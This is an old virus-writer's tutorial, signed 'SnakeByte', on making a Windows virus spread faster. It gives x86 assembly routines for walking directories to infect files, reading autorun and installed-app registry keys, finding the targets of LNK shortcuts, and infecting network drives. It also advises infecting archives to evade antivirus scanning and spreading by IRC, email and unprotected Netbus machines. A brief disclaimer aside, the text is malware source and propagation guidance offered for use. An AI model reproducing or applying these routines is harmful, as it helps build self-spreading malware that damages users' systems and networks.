http://kickme.to/Cryptic/
fly.to/alpina
Faster Spreading
or
What to include in your virus to make it spread more effective
by SnakeByte [SnakeByte@kryptocrew.de]
Here we go, please notice that it is illegal to spread viruses, and all
this information is completely theoretical, or for testing purpouses
in a controlled environment.
I just wrote one Windows-Virus so you will see here just few
lines of code.. ( interesting ones I think but maybe not very optimized ;)
The task of a virus is to spread ( Payload is just a side-effect ).
So we need some tricks ( besides infection *g* ) to make our virus
spread, as fast as possible.
Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;)
But if something went bad, we just get some files in the current directory
and the victim deletes it, because he does not like the infected app.. :(
Not very good, so what to do to avoid this situation ?
Here are 6 ideas what we can do :
1.) Infect as many file-types as possible.
2.) Try to drop over archives
3.) Parse Directory's
4.) Use the Registry
5.) Follow Links
6.) Worming
Ok, let's take a closer look at each of these methods:
1.) Infect as many file-types as possible.
If you are macro coder, you should try to infect as many documents which
support macro as possible ( DOC, CDR, DOT, PPT, XLS.. ).
Same for the assembler coders, there are a lot of file formats which can
be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD.
Maybe you should try to code a hybrid which is able to infect Binaries on
the one hand and macro on the other hand, this will offer you a much higher
chance of finding files for infection. In VDat there is a description for how
to infect most file types. I think adding 200-400 Bytes to your virus and
being able to infect another type is a very good deal. The more files you
infect the more likely you get your virus around.
2.) Try to drop over archives
Nowadays nearly every file you download somewhere or get send by
someone is zipped or packed with another archiver ( RAR, ACE ..)
It is possible to infect the files in the archives too. It also offers
you a small protection against AV programs, because AVP for example
does not scan archives by default. Read Unknown Mnemonix Tutorials
about archive infection for more information about how to do this.
So if you infect an archive you archive two goals ( stupid sentence ;P )
the might not get detected, it is possible that someone uploads the archiv
to a website and your virus get's lots of hits..
3.) Parse Directory's
Ok, now we infect a lot of files, but still all are in the same directory,
so we need to change and parse directory's. What we should infect nearly
always are the windows and the system directory's, cause they include a lot
of files, which are highly used. Use the GetWindowsDirectory and GetSystemDirectory
API's to retrieve their names. Then you should parse directory's to find more
files to infect. Otherwise we would have infected the current, the win and sys
directory, but nothing else, which is not very useful ( how often do you dcc a
friend your calc.exe ? *g* ) There are two ways of directory parsing, the one
is upwards the other downwards. If you travel downwards ( like cd.. in dos), you
would normally not find a lot of files, so traveling upwards is recommended.
This can be simply done with a FindFirstFile / FindNextFile Loop.
The current directory is assumed to be root on one of the drives.
The FindNextFileProc and FindFirstFileProc are procedures that call the
matching API's ( I think you'll also use them several times )
The RandomNR procedure just generates a random number in dx.
************************
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0 ; check if we reached the number of files we want to infect
jbe EndParsing ; we infected enoug ? ok, leave !
lea esi, [ebp+Folders]
Call FindFirstFileProc
inc eax
jz EndParsing ; If there are no directorys we return
dec eax ; otherwise we save the handle
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
lea esi, [ebp+WFD_szFileName]
cmp byte ptr [esi], '.' ; we will not parse into . or ..
je NoThisOne ; directorys
call RandomNR ; generate a random Number, if it is 1
dec edx ; we infect the directory, otherwise
; we go on searching
jz ParseNewDir ; we get this directory
NoThisOne:
call FindNextFileProc ; Find next directory
test eax, eax
jnz GetOtherDir
EndParseDir2: ; we close the search - Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
EndParsing: ; we just return
ret
ParseNewDir: ; we got a direcory, let's change to it
; and infect it.. *eg*
; close Find-Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
; set new directory
lea esi, [ebp+WFD_szFileName]
push esi
call dword ptr [ebp+XSetCurrentDirectoryA]
jmp ParseFolder ; parse it again !
Folders db '*.',0
************************
4.) Use the Registry
The Windows Registry also offers us a lot of information about what files
or directorys we should infect to be sure that our virus gets activated
again and does not sleep inside some never used files. You need to load
an additional DLL in your virus, but i think this is ok. If you can't load
the DLL, just jmp over the registry routines and infect fewer files.
I think you all know what the windows registry is or ? For those who don't:
the registry replaces the old ini files which have been used in older versions
of windows ( 3.1 ). The registry information is stored in the User.dat and
System.dat. To view or change the registry use 'regedit.exe', which is delivered
with every version of windows.
The following API's are neseccairy to access the registry, they are all
inside the ADVAPI32.DLL !
RegOpenKeyEx - Opens a registry key
RegCloseKey - Closes an open key
RegCreateKey - Creates a key
RegEnumKeyEx - Enumerates subkeys
RegQueryValueEx - Retrieves a value
RegEnumValue - Enumerates values
Ok, let's see some source how to get a value from registry :
This little piece of code gets the Startmenue Folder
************************
lea esi, RegHandle
push esi
push 001F0000h ; complete access
push 0h ; reserved
lea esi, SubKey
push esi
push 80000003h ; HKEY_USERS
call RegOpenKeyExA
test eax, eax ; if we failed opening the key, we return
jnz WeFailed
; let's get the value
lea esi, BufferSize
push esi
lea esi, Buffer
push esi
lea esi, ValueType
push esi ; Type of Value
push 0 ; reserved
lea esi, Value
push esi ; ValueName
mov eax, RegHandle
push eax ; Reg-Key Handle
call RegQueryValueExA
mov eax, dword ptr [RegHandle]
push eax
call RegCloseKey
WeFailed:
ret
SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Value db 'Start Menu',0
ValueType dd 0h ; Type of registry Value
BufferSize dd 7Fh ; size of buffer
Buffer db 7fh dup (0)
************************
Buw what can we use the registry for ? Ok let's see some interesting values :
In these Keys are the autostarted files :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
Here are the paths of all installed apps, what about parsing this key ? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Several standard directories :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
Shared files ( infect them "two for the price of one" *g* )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
Registered Help Files ( if your virus infects them, here you get a whole bunch of )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help
Computer Network Name ( nice value for slow poly )
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName
A list of installed files (vxd, exe, dll, hlp, pif,.. ) :
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\InstalledFiles
5.) Follow Links
Windows uses LNK-Files to create shortcuts for often used files, so you
don't need to copy a 8 MB huge file to your desktop. If you find such
a Link, you should check if it points to a file you are able to infect,
if so.. don't wait and drop your code over it.
Very useful becomes this if you parse the Start-Menue or the desktop *eg*
Here is some example code from my Win32.DDoS how to do this, it does not
work with NT-LNK Files :( There is also an API we can use for this, but I
never figured it out, but I think this is not that much code, so we can
include it.
I assume you retrieved the LNK-File with the help of FindFirstFile
/ FindNextFile and the information is stored in the WIN32_FIND_DATA
Structure, I also assume that the file is mapped and the base
address in MapAddress.
************************
; first of all, we check for the file
; mark, it is a single 'L' followed by a zero
mov esi, dword ptr [ebp+MapAddress]
cmp word ptr [esi], 'L' ; check for sign
jne NoLNK ; if it is no LNK File we close it
; Let's make a check for the file-size,
; I don't think that there are any shortcuts
; bigger than 1 MB, just to be sure.
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h
ja NoLNK
; get the start addy in esi, and and the size
mov esi, dword ptr [ebp+MapAddress]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
xor edx, edx
add esi, ecx ; we start checking at the end of the file
; for a valid filename in it
CheckLoop:
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
jne LNKSearch ; in the Drive
; for example C:\whatever\blah.exe
; we search for the ':'
inc edx ; there are 2 times 2 dots, when checking from
cmp edx, 2d ; the end of the LNK, we need the 2.nd
je PointsDetected ; the first : is inside the path ( without filename )
; so we skip them
LNKSearch: ; go on searching
dec esi ; we search until we found the dots or
loop CheckLoop ; searched the entire file ( size in ecx )
; I don't want to create a SEH .. ;)
; if we end here, we did not find the two dots.. :(
NoLNK:
ret ; return to search more files...
PointsDetected: ; we found the drive ( two dots ... *g* )
; esi points to them, now we need to check
; the name..
cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a
je NoLNK ; single drive
; this can happen sometimes with NT or 2k
; shortcut files, so we better avoid them
PointsDetected2: ; now we search the starting point of the name
dec esi ; by searching for a zero
cmp byte ptr [esi], 0h
je NameDetected
loop PointsDetected2 ; ecx still takes care, that we don't
; search too far..
jmp NoLNK ; nothing found ? return..
NameDetected: ; ok, esi points now to the name of the file
inc esi ; you can now open this file and check if it is
; something you are able to infect
; it's just that easy, but very effective, if you
; do this in the right folders,.. ;)
************************
6.) Worming
To make sure you don't stay on a single computer you should try to spread over
networks. One way are IRC-Worms, which sends your virus to other chatting people.
To my mind this is the easiest way to worm around.
Another way is to check all drives and if you have access to a network drive,
infect there some files.
************************
push offset Buffer ; offset of the buffer
push 60h ; buffer-lenght
call GetLogicalDriveStrings
cmp eax, 0 ; did we fail ?
je StopThis
lea esi, Buffer
WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork
; esi still contains the offset of
; the root dir on the drive
call infectDrive ; so we infect it.. ;P
NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)
************************
Another way is, like the 911-Dialer does, to scan IP ranges when the user
is online for non-pass protected Netbus PC's. If you have access, just upload
your virus ;)
Finally, you can worm with the help of E-Mails, infect a program and send
it with the help of Visual Basic Script or with the MAPI Commands around. This
is maybe the fastest and most efficient way of spreading, cause the snowball
effect is very huge. But if you use VBS and Outlook, please keep in mind that it
is worse enough that your virus just spreads in one OS, if it also relies on
two frontends ( OE and VB Scripting Host ) it becomes even worse ;)
Hope this little text helps at least some peoples, I enjoyed writing it, and hope
you do so too while reading it... ;)
cu SnakeByte